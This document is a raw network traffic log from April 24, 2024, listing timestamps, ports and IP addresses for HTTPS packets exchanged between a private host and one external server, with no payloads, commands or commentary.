Apr 24, 2024 06:54:14.598077059 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.600671053 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.600687981 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.600744009 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.600749969 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.600785017 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.604087114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.604111910 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.604147911 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.604155064 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.604176044 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.604192019 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.606777906 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.606794119 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.606847048 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.606852055 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.606887102 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.609436035 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.609452009 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.609503984 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.609509945 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.609544992 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.612459898 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.612477064 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.612529993 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.612535000 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.612569094 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.614984989 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.615003109 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.615053892 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.615058899 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.615092039 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.617443085 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.617460966 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.617527962 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.617535114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.617577076 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.619971991 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.619987011 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.620058060 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.620064020 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.620105028 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.622935057 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.622953892 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.623014927 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.623022079 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.623054981 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.625411034 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.625435114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.625499964 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.625504971 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.625549078 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.627950907 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.627968073 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.628026962 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.628031015 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.628066063 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.630527973 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.630546093 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.630604982 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.630610943 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.630650043 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.633574963 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.633591890 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.633651972 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.633657932 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.633819103 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.635863066 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.635879040 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.635930061 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.635935068 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.635970116 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.638412952 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.638430119 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.638479948 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.638485909 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.638520002 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.641012907 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.641028881 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.641082048 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.641088009 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.641122103 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.644009113 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.644026995 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.644078970 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.644084930 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.644121885 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.646586895 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.646617889 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.646648884 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.646653891 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.646678925 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.646692991 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.649017096 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.649035931 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.649094105 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.649100065 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.649135113 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.652173996 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.652189970 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.652299881 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.652306080 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.652393103 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.654500961 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.654519081 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.654598951 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.654603004 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.654647112 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.657360077 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.657378912 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.657449007 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.657454014 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.657500982 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.659473896 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.659492970 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.659558058 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.659563065 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.659605980 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.662533998 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.662559032 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.662606955 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.662615061 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.662623882 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.662655115 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.665123940 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.665139914 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.665213108 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.665216923 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.665254116 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.667593002 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.667613029 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.667690039 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.667695999 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.667732954 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.670154095 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.670170069 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.672650099 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.672658920 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.672718048 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.672972918 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.673037052 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.673041105 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.673100948 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.675604105 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.675621986 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.675720930 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.675728083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.675770044 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.678061008 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.678137064 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.678142071 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.678201914 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.680635929 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.680653095 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.680716038 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.680721045 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.680757999 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.696188927 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.696208954 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.696304083 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.696311951 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.696346998 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.698049068 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.698064089 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.698276997 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.698280096 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.698313951 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.700012922 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.700028896 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.700095892 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.700108051 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.700120926 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.700143099 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.702280998 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.702299118 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.702349901 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.702353954 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.702375889 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.702389956 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.704607010 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.704624891 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.704674959 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.704679012 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.704705000 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.704725981 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.706598997 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.706615925 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.706670046 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.706672907 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.706696033 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.706713915 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.708616972 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.708633900 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.708688021 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.708693981 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.708717108 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.708744049 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.710490942 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.710508108 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.710592985 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.710601091 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.710642099 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.712951899 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.712968111 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.713040113 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.713046074 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.713088989 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.714979887 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.714999914 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.715089083 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.715095997 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.715132952 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.716675043 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.716695070 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.716737032 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.716744900 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.716758966 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.716787100 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.718641043 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.718657017 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.718724012 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.718729019 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.718769073 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.720931053 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.720952034 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.721010923 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.721019030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.721057892 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.723242998 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.723258972 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.723324060 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.723331928 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.723373890 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.725281954 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.725296974 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.725363016 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.725373030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.725420952 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.726974010 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.726989031 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.727050066 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.727061033 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.727102995 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.728976965 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.728992939 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.729054928 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.729069948 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.729111910 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.732501030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.732522964 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.732593060 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.732604980 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.732646942 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.733793020 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.733809948 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.733869076 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.733875036 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.733912945 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.735160112 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.735174894 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.735234022 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.735239983 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.735275030 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.737443924 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.737458944 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.737529039 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.737543106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.737597942 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.739409924 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.739428043 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.739484072 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.739492893 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.739532948 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.741204977 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.741219997 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.741281033 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.741295099 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.741338015 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.743283987 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.743300915 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.743354082 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.743364096 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.743401051 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.745078087 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.745093107 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.745142937 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.745151043 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.745187044 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.747428894 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.747466087 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.747503996 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.747517109 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.747544050 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.747566938 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.749882936 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.749900103 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.749973059 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.749979973 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.750147104 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.751518011 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.751533985 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.751646042 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.751652956 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.751694918 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.753714085 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.753729105 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.753798008 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.753804922 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.753850937 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.756036997 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.756053925 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.756120920 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.756127119 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.756175041 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.757783890 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.757800102 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.757875919 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.757883072 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.757927895 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.759841919 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.759855986 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.759907961 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.759913921 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.759947062 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.761518955 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.761533976 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.761583090 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.761589050 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.761622906 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.763963938 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.763979912 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.764061928 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.764066935 CEST	443	49732	104.21.45.138	192.168.2.4
